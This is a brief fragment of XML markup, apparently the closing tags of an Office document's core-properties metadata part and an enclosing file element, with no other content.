</cp:coreProperties>
</file>